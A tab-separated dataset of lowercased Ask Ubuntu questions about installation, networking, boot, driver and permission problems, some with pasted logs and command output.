477493	some nepomuk has randomly installed itself	i found that some nepomuk package was installed without i even notice . do you know why this happens ? i read some other similar cases . this is an extract of my cat /var/log/apt/history.log . it seems to have been aptdeamon , which i do n't know what it does . start-date : 2014-06-05 16:39:55 commandline : apt-get install pantheon-files-plugin-dropbox install : pantheon-files-plugin-dropbox : amd64 ( 0.1-0~22+r1~precise1 ) end-date : 2014-06-05 16:40:04 start-date : 2014-06-05 17:36:50 commandline : aptdaemon role='role-commit-packages ' sender=':1.66' $ todbc0 : amd64 ( 6.1.4+dfsg1-0ubuntu1 , automatic ) , libnepomuksync4 : amd64 ( 4.8.5- $ end-date : 2014-06-05 17:40:23 start-date : 2014-06-05 18:54:51 commandline : apt-get autoremove remove : kde-l10n-es : amd64 ( 4.8.5-0ubuntu0.1 ) , language-pack-kde-es-base : amd64 $ end-date : 2014-06-05 18:55:10
477494	have to restart networking every 10 seconds	i just created a new ubuntu server and i can not get the thing to do anything network related for more than 10 seconds . when i first start the machine up i can ping 8.8.8.8 about 10 times before there is no more responses . i can not seem to do anything else network related until i sudo /etc/init.d/networking restart what is strange about this is that once i restart networking , it will work for about 10 seconds . so if i restart it , and then wait 10ish seconds then ping will not work . but if i ping right after i restart networking , then it will work for about 10 seconds before just stopping . it looks something like this : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=49 time=66.3 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=49 time=67.4 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=49 time=69.7 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=49 time=67.8 ms 64 bytes from 8.8.8.8 : icmp_req=5 ttl=49 time=67.7 ms 64 bytes from 8.8.8.8 : icmp_req=6 ttl=49 time=67.7 ms 64 bytes from 8.8.8.8 : icmp_req=7 ttl=49 time=67.7 ms 64 bytes from 8.8.8.8 : icmp_req=8 ttl=49 time=70.1 ms 64 bytes from 8.8.8.8 : icmp_req=9 ttl=49 time=70.3 ms 64 bytes from 8.8.8.8 : icmp_req=10 ttl=49 time=70.2 ms it just stays like that forever . until i hit crtl-c this is a wired connection straight into my router , if that matters . i also apparently do not have network-manager installed because whenever i try to run it with sudo service network-manager restart it says that network-manager : unrecognized service does anyone have any idea what is going on ?
477499	preseed proxy setting for local repository	i 'm trying to set up a preseed configuration for ubuntu 14.04 network installation from the example on the official documentation . i am affected by the proxy bug on choose-mirror . i 'm using an apt-cacher-ng proxy . due to this , adding a local repository fails , as the key can not be downloaded through the apt-cacher-ng proxy . usually i get an error about the key itself . then i tried using a random gpg key from the mirror specified in apt-cacher-ng backend ( in.archive.ubuntu.com , in this case ) . the error about the key vanished ( at least the related prompt did n't appear ) , but the local repository was still not added , even though i had set : d-i debian-installer/allow_unauthenticated boolean true using my campus mirror directly , thus avoiding the proxy , throws up an error about grub-pc failing to install ( perhaps due to some problem with the mirror ? ) . what can i do use both the cacher and the local repository together ? i can think of the following possibilites : apt-cacher-ng has an option to let some domains/urls slide , instead of outright rejecting them . debian-installer has a way to use the local repo without a key . debian-installer has a question for more specific proxy settings ( e.g. , only for apt ( ideal ) , no_proxy lists , etc. ) . install one package by itself ( which contains the key for the repository and a sources.list.d entry ) , before d-i starts installing packages . wget the key and the list entry directly and add it , do apt-get update and other package installation via script in post install . find some way to fix the grub-pc error when using the local campus mirror directly .
477500	how do i boot directly into wayland	what all changes should i make in order to boot straight into wayland/weston . what i 've tried is that i 've made changes to grub_cmdline_linux_default= '' text '' and that gives me a cli prompt at boot where i type weston-launch what i need to do is i need to automate the booting straight to wayland/weston without any other overheads .
477502	i ca n't login into ubuntu server 14.04 !	here is the problem.i start the computer and after the toshiba logo.it show : username : password : i type the username and password and press enter ( the password do n't appear ) . i have try many solution , but still ca n't login . i hope you can help me . please help me ...
477503	error message while installing any software as `` package dependencies can not be resolved ''	when i am installing the softwares by all means ( via software center , terminal etc ) it gives an error message as `` package dependencies can not be resolved '' can any one help me out to solve the problem ? ? error in detail '' this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . ''
477504	problem after installing lamp in ubuntu	after installing apache2 it show message like this index of / [ ico ] name last modified size description apache/2.4.7 ( ubuntu ) server at localhost port 80 how to install this properly ?
477505	ubuntu dual boot not repaired by boot-repair after installing windows 7	i reinstalled windows 7 on my dual boot machine ( thinkpad x220 ) . nowto get back the bootmenu i followed https : //help.ubuntu.com/community/recoveringubuntuafterinstallingwindows boot-repair says repair successful . but i ca n't find the boot menu.. not even after holding shift key.. it directly enters windows . here are the details of boot-repair pastebin http : //paste.ubuntu.com/7597449/ any help would be appreciated !
477510	why does not the ubuntu 13.10 have the version.h ?	/usr/src/linux-header-3.11.0.12 /usr/src/linux-header-3.11.0.12-generic neither has the version.h file in the /include/linux/ . why ? that hinders the softwares installation . but the ubuntu 11.10 has it .
477512	grub shows some time and does show some time	i have only ubuntu-gnome 14.04 on my laptop when i am booting into my system some times only show 's the grub . any way i do n't need the grub any more but , if i have to get into generic mode to reset my password then what should i do grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=lsb_release -i -s 2 > /dev/null || echo debian grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : dell device [ 1028:0597 ] kernel driver in use : i915
477514	qiime softwares not recognized by php . how to configure extentions for it ?	i have a script in bash that calls some python functions installed from qiime packge . i put a echo `` end of bash script '' only for control . if i call this bash script from terminal it works good . but if i call the bash script from php ( netbeans + lamp ) a can see the message control on the browser and i see `` parallel_align_seqs_pynast.py : not found 127 '' . i d'ont know exactly what is the problem . maybe php is not recognizing the python executables . my question is , how to install theses phyton extentions for php ext directory on ubuntu ? any idea will be appreciated . thanks
477515	exact booting how to do it .	in my lap dell inspiron 15r 5521 i used to have window 's 8 and then i tried to dual boot with window 's 8 and got my whole window 's 8 deleated . can any one give me the links of how to do dual boot exactly and what a mount point is and all those stuff such as uefi , swap space , and those thing .
477517	touchpad detected but not working in ubuntu 14.04 on toshiba satellite p75 a7200	i have a toshiba satalite that i have just installed ubuntu 14.04 on and it runs great . but the touchpad does not work . i plugged in a usb mouse and it worked fine but the laptop touchpad wont work . i tried everything i could find under the sun and it is detected and all and says its enabled but does not work . i have pressed fn f7 to enable the mouse and still nothing . synaptics is installed im pretty sure to because i used synaptics -- list or something like that and it worked fine .
477520	chrome automatic session restore	i 'm running chrome as webbrowser . if i shutdown my computer it will close ( or kill - i dont know ) it . after restarting the computer and starting chrome it provides me the option to restore the session . is it possible to tell chrome to automatically restore it ? ( yopp , i 'm lazy ... ) i think that was the default behavior a time ago , but now it does not work anymore ...
477522	windows 7 data recovery after installing ubuntu	i have a 500gb hard disk . while installing ubuntu , ubuntu is replaced windows 7 . after installation ubuntu found whole 500gb storage on ubuntu itself . i suppose i lost all data on windows which was very very important and it is around 176 gb . how do i get it back ? please help ...
477528	pairing bluetooth keyboard , the `` continue '' button is disabled . why ?	i 'm trying to pair a samsung keyboard to my lenovo yoga via bluetooth . as you can see from attached picture , the computer recognizes the keyboard , yet the `` continue '' button remains disabled , no error message or anything.. how can i find out what is wrong ?
477529	i executed 'dd ' on my /dev/sda and now i get `` unknown filesystem '' error	yes , i know this error has been answered and solved many times ; but i think i know the reason why this is happening ( my bad ) , i just do n't know how to solve it . i was formatting and flashing some usb with 'dd ' like : dd if=myimage.img of=/dev/sdb1 bs=1m and everything was perfectly fine until i did a big mistake : dd if=myimage.img of=/dev/sda bs=1m i tried to dd my /dev/sda filesystem , i got a message like this ( not exactly this , i could n't copy it ) : 96452+0 records in 96452+0 records out 71383424 bytes ( 7.1 mb ) copied , 60.664 s , 495 mb/s so i guess it started to overwrite the stuff in /dev/sda , then it crashed and i got this : so i guess i started writing on the primary partition , and overwrite important stuff at the beginning of the filesystem . after this , i get the : error : unknown filesystem grub rescue > from which i can not get out of . i have tried the answers of other questions but i ca n't get rid of it . any ideas ? if you need more info , just ask . it will be helpful !
477532	m-audio delta 66	greetings i have successfully installed my m-audio delta 66 on ubuntu 12.04 and have been using the alsa mudita24 to monitor signals . one functionality though that seems to be missing is the monitor mixer function , which essentially was an available input bus that could be recorded like the other physical inputs ( hw 1+2 and hw 3+4 ) . this way anything running through the master out could be recorded , making it a great utility for recording anything off the web , or running application . i only noticed that it was missing from the mudita24 panel when i attempted to choose the monitor input using soundfroge in wine . can anyone tell me if there is a way to activate this feature that was available with the windows drivers or if there is an ubuntu application that will access this feature ? i have read this which mentions the monitor mixer , but i still can not access the input in soundforge . may this be a limitation of wine ? aslo is there another sound application i could use to record with in ubuntu ( not wine ) to test this out ?
477536	wifi led is lit after suspend	because the broadcom module in my dell laptop was faulty , i replaced it with an atheros ar9285 pcie card . this works fine with the ath9k modules , the led works as should , even the rfkill switch on the side works perfectly . the only `` issue '' i have is that the blue wifi led is always burning after suspend ( even if the wifi card is off ) . my question : how can i prevent this from happening ? the solutions i came up with : ifup and directly ifdown the wlan0 interface after resume . this works , but is cumbersome . remove the module during suspend ( suspend_modules= '' ath9k '' ) . this works , but then the wicd daemon needs to be restarted as well manually shut down the led ( echo 0 > /sys/class/leds/ath9k-phy0/brightness ) after resume . this works , but then the led does n't turn on again when i ifup the wifi card ( so i can no longer see if the wifi is actually running or not ) . neither solutions seem really compelling . any hints would be appreciated !
477540	ubuntu 14.04 installer wo n't recognize free spaces	i use disk management in windows 8 to free some spaces ( 50 gb ) . in the installing there was two options : 1-replace ubuntu 2-something else . i choose something else but it shows two drives but i have four drives in windows . is there any solution that without reinstall windows i could install ubuntu on that 50 gb .
477541	a path that appears first should be considered in first place ?	i 'm having a strange problem with a ubntu 12.04 server : hithwen @ ip : ~ $ cmake -- version cmake version 2.8.12.2 buildbot @ ip : ~ $ cmake -- version cmake version 2.8.7 so , different users are executing different versions , ok , let 's see where are they located : hithwen @ ip : ~ $ which cmake /usr/local/bin/cmake buildbot @ ip : ~ $ which cmake /usr/bin/cmake so it seems i need to fix buildbot user 's path but : buildbot @ ip : ~ $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games /usr/local/bin it 's already before /usr/bin , how can i solve this ? i can not uninstall cmake package because other packages depend on it and i can not upgrade it via repositories because last version is not available in 12.04 repos .
477542	ubuntu 14.04 , only wallpaper and a mouse cursor is showing	i upgraded to ubuntu 14.04 weeks ago , that was a fresh install . and as usual installed , unity tweak tool , some themes , chrome , eclipse etc . today , while playing with unity tweak tool , i mistakenly switched window spread to off , and bang , no problem yet . after realizing what i did i switched it to on again and then , the title bar of all windows , the status bar ( guessing it 's called that ) , and the launcher disappeared . now i was left with a mouse cursor and the unity tweak tool window , without the title bar . i thought a restart is needed , but sadly no shutdown option to click on , moreover , the keyboard did n't worked , neither the hardware shutdown button . so , i pressed the reset button . after a mundane restart , i was welcomed by the wallpaper and the mouse cursor , moving , that 's it . searched everywhere for a working solution , found some solutions in askubuntu itself , but they where all old and required terminal to be used , but since my keyboard is n't working , no access to the terminal . so , ofcource the question is n't a dublicate , at least , imho . also , i was working on an android project and have got no backups , so i wo n't be going for a clean install , or else i will start crying watching my weeks of work being deleted , any solutions , please .
477543	usb and network adapters do n't work after ubuntu 14.04 fresh install . no ethernet , wifi , bluetooth , usb	after a failed upgrade from ubuntu 13.10 to 14.04 ( see ) , i fresh installed from a life usb . in the test system and in 13.10 usb and all my networks were working out of the box ( bluetooth , ethernet , wifi , gsm card ) . first i ran into a login-loop problem , due to wrong permissions of the .xauthority file ( see ) . now i have no network adapters and no usb ports at all being recognized . my system . uname -a is : linux lusatia 3.13.0-27-generic # 50-ubuntu smp thu may 15 18:06:16 utc 2014 x86_64 x86_64 x86_64 gnu/linux ifconfig yields : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:293 errors:0 dropped:0 overruns:0 frame:0 tx packets:293 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:21825 ( 21.8 kb ) tx bytes:21825 ( 21.8 kb ) iwconfig yields : lo no wireless extensions . sudo lshw -c network gives : *-network unclaimed description : network controller product : centrino advanced-n 6205 [ taylor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 96 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0c00000-f0c01fff sudo rfkill list gives no output . dpkg -l linux-firmware desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ii linux-firmware 1.127.2 all firmware for linux kernel drivers sudo modprobe iwlwifi modprobe : error : ../libkmod/libkmod.c:556 kmod_search_moddep ( ) could not open moddep file '/lib/modules/3.13.0-27-generic/modules.dep.bin' modprobe : error : ../libkmod/libkmod.c:556 kmod_search_moddep ( ) could not open moddep file '/lib/modules/3.13.0-27-generic/modules.dep.bin' modprobe : error : ../libkmod/libkmod.c:556 kmod_search_moddep ( ) could not open moddep file '/lib/modules/3.13.0-27-generic/modules.dep.bin' modprobe : error : ../libkmod/libkmod-module.c:809 kmod_module_insert_module ( ) could not find module by name='iwlwifi' modprobe : error : could not insert 'iwlwifi ' : function not implemented in my dual boot windows 7 all network is working fine . could that all be a simple problem with some network config file ?
477545	unable to connect tata photon plus ubuntu 12.04	i am not able to connect my tata photon plus in ubuntu 12.04 . i have already used these commands sudo mkdir /media/modem sudo mount /dev/sr1 /media/modem but i could not get any file inside /modem folder any suggestions on how to proceed ?
477546	weird behavior after upgrading to kernel 3.13.0-29 generic ( 3.13.0-29.53 )	i 'm already aware of another weird behavior which is if i time my laptop to shutdown while the lid is closed , if i try to boot it up again after its shutdown , it looks like its starting up and plymouth ( i.e . ubuntu 's splash screen loader ) appears loading , but then the laptop actually shuts-down . i 'm used to that , hopefully it will be fixed soon . what happened for the first time is that during the first load ( which should lead to a shutdown and i have to turn it on again ) i saw this error message : [ 23.823395 ] [ drm : si_dpm_set_power_state ] *error* si_disable_ulv failed and everything froze . what bugs me the most is that i even do n't have a clue what this message is trying to tell me other than that something has failed and caused an error ! that last updates i installed are as shown in the screenshot what does this error message mean ? and what can i do if it persists ?
477548	dual-boot windows 8.1 uefi and ubuntu , grub not showing	before starting , i 'd like to point out that after checking out alot of topics on the forum , i still have n't found a solution that works for me , so i hope this does n't get flagged as a quesiton already answered . either way , i 'm using a laptop with w8.1 installed ( came with windows 8 pre-installed ) , and i have been having trouble getting it to dual boot . i 'm pretty noob at linux in general , although i 've installed several other dual boots ( bios installs though ) . i started by deactivating secure boot and enabling csm , so i could finally boot from live usb with ubuntu on it . i managed to get to the ubuntu install , installed side by side with windows 8.1 , but now the problem is that when i reboot , i do n't see the grub menu ! when i boot from live usb , heres the gparted : http : //picpaste.com/wp_20140606_09_44_14_pro-s72mstem.jpg also , interesting fact , when i choose from liveusb menu to boot from primary partition , i get a busybox command line ! thanks for anyone who can throw me a line : )
477551	how can i use docker without sudo ?	on docker 's documentation pages , all example commands are shown without sudo , like this one : docker ps on ubuntu , the binary is called docker.io . it also does not work without sudo : sudo docker.io ps how can i configure docker so that i do n't need to prefix every docker command with sudo ?
477553	ubuntu 14.04 ca n't get nvidia-prime working	yesterday i upgraded to 14.04 from 13.10 and wanted to try nvidia-prime . however , i am unable to get it working . the message i am getting when i run 'nvidia-settings ' at the command line is as follows : error : error querying target relations ** message : prime : no offloading required . abort ** message : prime : is it supported ? no error : nvidia-settings could not find the registry key file . this file should have been installed along with this driver at either /usr/share/nvidia/nvidia-application-profiles-331.38-key-documentation or /usr/share/nvidia/nvidia-application-profiles-key-documentation . the application profiles will continue to work , but values can not be preopulated or validated , and will not be listed in the help text . please see the readme for possible values and descriptions . i tried installing and uninstalling many times following different suggestions that i could find , but apparently i am doing something wrongly as the guy here gets it to work on exactly the same laptop as mine ( on 13.10 ) thank you very much
477558	14.04 lts , 32-bit , software updater error `` failed to download repository information : check your internet connection ''	there is n't much to say about this one : when i run software updater , i get the above error message . that ca n't be good . interestingly , when i click on `` settings ... '' and then close the settings dialogue that pops up , all of a sudden software updater successfully finds updates and installs them . i thought i should bring this to the attention of the ubuntu community . sudo apt-get update returns the following : w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i have screen captures , but i do n't have enough reputation points to post them .
477559	edit menu permission issue	i 'm an lubuntu user , but i suppose it concerns everyone . for menu editing there are 3 guis : lxmed , menulibre , alacarte . great ! still the issue is that if i start as administrator , for example : gram @ gram-pc : ~ $ alacarte will edit menu , till the time i close app . it does n't have permission for that ... so nothing in menu has been changed ... gram @ gram-pc : ~ $ gksudo alacarte or root @ gram-pc : / # alacarte will open completely different menu with completely different items ... how can i grand permission to edit my-not-root-menu ?
477562	intermittent wired network issues in 14.04	since yesterday , my wired network connection has been dropping for a couple of seconds every 30 seconds or so . to my knowledge , i had not made any changes to my network . output of ifconfig -a : ➜ ~ ifconfig -a eth0 link encap : ethernet hwaddr 6c : f0:49 : b9 : b1:7f inet addr:192.168.0.16 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6ef0:49ff : feb9 : b17f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11597 errors:0 dropped:0 overruns:0 frame:0 tx packets:9783 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:10101682 ( 10.1 mb ) tx bytes:1215142 ( 1.2 mb ) interrupt:48 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:96691 errors:0 dropped:0 overruns:0 frame:0 tx packets:96691 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:13594355 ( 13.5 mb ) tx bytes:13594355 ( 13.5 mb ) lspci |grep ethernet : 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 03 ) pinging my router : ➜ ~ ping 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.0.1 : icmp_seq=1 ttl=64 time=0.435 ms 64 bytes from 192.168.0.1 : icmp_seq=2 ttl=64 time=0.571 ms ping : sendmsg : network is unreachable ping : sendmsg : network is unreachable ping : sendmsg : network is unreachable ping : sendmsg : network is unreachable ping : sendmsg : network is unreachable 64 bytes from 192.168.0.1 : icmp_seq=8 ttl=64 time=1.03 ms and the output of route : ➜ ~ route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 * 255.255.255.0 u 1 0 0 eth0 some messages from /var/logs/syslog : ➜ ~ tail -f /var/log/syslog jun 6 10:37:34 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:37:34 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:37:37 lolbox dnsmasq [ 1138 ] : maximum number of concurrent dns queries reached ( max : 150 ) jun 6 10:37:37 lolbox dnsmasq [ 1362 ] : maximum number of concurrent dns queries reached ( max : 150 ) jun 6 10:37:39 lolbox dhclient : xmt : solicit on eth0 , interval 8660ms . jun 6 10:37:39 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:37:39 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:37:47 lolbox dhclient : xmt : solicit on eth0 , interval 16820ms . jun 6 10:37:47 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:37:47 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:38:04 lolbox dhclient : xmt : solicit on eth0 , interval 34410ms . jun 6 10:38:04 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:38:04 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:38:16 lolbox networkmanager [ 862 ] : < warn > ( eth0 ) : dhcpv6 request timed out . jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 13045 jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : activated - > failed ( reason 'ip-config-unavailable ' ) [ 100 120 5 ] jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > networkmanager state is now disconnected jun 6 10:38:16 lolbox networkmanager [ 862 ] : < warn > activation ( eth0 ) failed for connection 'wired connection 1' jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : deactivating device ( reason 'none ' ) [ 0 ] jun 6 10:37:34 lolbox whoopsie [ 1133 ] : online jun 6 10:38:16 lolbox whoopsie [ 1133 ] : offline jun 6 10:38:16 lolbox dbus [ 485 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) jun 6 10:38:16 lolbox dbus [ 485 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 13044 jun 6 10:38:16 lolbox networkmanager [ 862 ] : < warn > dns : plugin dnsmasq update failed jun 6 10:38:16 lolbox networkmanager [ 862 ] : < info > removing dns information from /sbin/resolvconf jun 6 10:38:16 lolbox avahi-daemon [ 619 ] : withdrawing address record for fe80 : :6ef0:49ff : feb9 : b17f on eth0 . jun 6 10:38:16 lolbox avahi-daemon [ 619 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :6ef0:49ff : feb9 : b17f . jun 6 10:38:16 lolbox avahi-daemon [ 619 ] : interface eth0.ipv6 no longer relevant for mdns . jun 6 10:38:16 lolbox avahi-daemon [ 619 ] : withdrawing address record for 192.168.0.16 on eth0 . jun 6 10:38:16 lolbox avahi-daemon [ 619 ] : leaving mdns multicast group on interface eth0.ipv4 with address 192.168.0.16 . jun 6 10:38:16 lolbox avahi-daemon [ 619 ] : interface eth0.ipv4 no longer relevant for mdns . jun 6 10:38:16 lolbox dnsmasq [ 1362 ] : setting upstream servers from dbus jun 6 10:38:17 lolbox avahi-daemon [ 619 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :6ef0:49ff : feb9 : b17f . jun 6 10:38:17 lolbox avahi-daemon [ 619 ] : new relevant interface eth0.ipv6 for mdns . jun 6 10:38:17 lolbox avahi-daemon [ 619 ] : registering new address record for fe80 : :6ef0:49ff : feb9 : b17f on eth0.* . jun 6 10:38:18 lolbox dnsmasq [ 1138 ] : no servers found in /var/run/dnsmasq/resolv.conf , will retry jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > auto-activating connection 'wired connection 1 ' . jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) starting connection 'wired connection 1' jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > networkmanager state is now connecting jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > dhclient started with pid 13160 jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) beginning dhcpv6 transaction ( timeout in 45 seconds ) jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > dhclient started with pid 13161 jun 6 10:38:18 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . jun 6 10:38:18 lolbox avahi-daemon [ 619 ] : withdrawing address record for fe80 : :6ef0:49ff : feb9 : b17f on eth0 . jun 6 10:38:18 lolbox avahi-daemon [ 619 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :6ef0:49ff : feb9 : b17f . jun 6 10:38:18 lolbox avahi-daemon [ 619 ] : interface eth0.ipv6 no longer relevant for mdns . jun 6 10:38:18 lolbox dhclient : internet systems consortium dhcp client 4.2.4 jun 6 10:38:18 lolbox dhclient : copyright 2004-2012 internet systems consortium . jun 6 10:38:18 lolbox dhclient : all rights reserved . jun 6 10:38:18 lolbox dhclient : for info , please visit https : //www.isc.org/software/dhcp/ jun 6 10:38:18 lolbox dhclient : jun 6 10:38:19 lolbox dhclient : internet systems consortium dhcp client 4.2.4 jun 6 10:38:19 lolbox dhclient : copyright 2004-2012 internet systems consortium . jun 6 10:38:19 lolbox dhclient : all rights reserved . jun 6 10:38:19 lolbox dhclient : for info , please visit https : //www.isc.org/software/dhcp/ jun 6 10:38:19 lolbox dhclient : jun 6 10:38:19 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit jun 6 10:38:19 lolbox dhclient : bound to *:546 jun 6 10:38:19 lolbox dhclient : listening on socket/eth0 jun 6 10:38:19 lolbox dhclient : sending on socket/eth0 jun 6 10:38:19 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : dhcpv6 state changed nbi - > preinit6 jun 6 10:38:19 lolbox dhclient : listening on lpf/eth0/6c : f0:49 : b9 : b1:7f jun 6 10:38:19 lolbox dhclient : sending on lpf/eth0/6c : f0:49 : b9 : b1:7f jun 6 10:38:19 lolbox dhclient : sending on socket/fallback jun 6 10:38:19 lolbox dhclient : dhcprequest of 192.168.0.16 on eth0 to 255.255.255.255 port 67 ( xid=0x3fc9376d ) jun 6 10:38:19 lolbox dhclient : xmt : solicit on eth0 , interval 1020ms . jun 6 10:38:19 lolbox dhclient : send_packet6 : can not assign requested address jun 6 10:38:19 lolbox dhclient : dhc6 : send_packet6 ( ) sent -1 of 77 bytes jun 6 10:38:20 lolbox dhclient : dhcpack of 192.168.0.16 from 192.168.0.1 jun 6 10:38:20 lolbox dhclient : bound to 192.168.0.16 -- renewal in 41481 seconds . jun 6 10:38:20 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > reboot jun 6 10:38:20 lolbox networkmanager [ 862 ] : < info > address 192.168.0.16 jun 6 10:38:20 lolbox networkmanager [ 862 ] : < info > prefix 24 ( 255.255.255.0 ) jun 6 10:38:20 lolbox networkmanager [ 862 ] : < info > gateway 192.168.0.1 jun 6 10:38:20 lolbox networkmanager [ 862 ] : < info > nameserver '83.255.245.11' jun 6 10:38:20 lolbox networkmanager [ 862 ] : < info > nameserver '193.150.193.150' jun 6 10:38:20 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... jun 6 10:38:20 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... jun 6 10:38:20 lolbox avahi-daemon [ 619 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.0.16 . jun 6 10:38:20 lolbox avahi-daemon [ 619 ] : new relevant interface eth0.ipv4 for mdns . jun 6 10:38:20 lolbox avahi-daemon [ 619 ] : registering new address record for 192.168.0.16 on eth0.ipv4 . jun 6 10:38:20 lolbox dhclient : xmt : solicit on eth0 , interval 2110ms . jun 6 10:38:20 lolbox dhclient : send_packet6 : can not assign requested address jun 6 10:38:20 lolbox dhclient : dhc6 : send_packet6 ( ) sent -1 of 77 bytes jun 6 10:38:20 lolbox avahi-daemon [ 619 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : 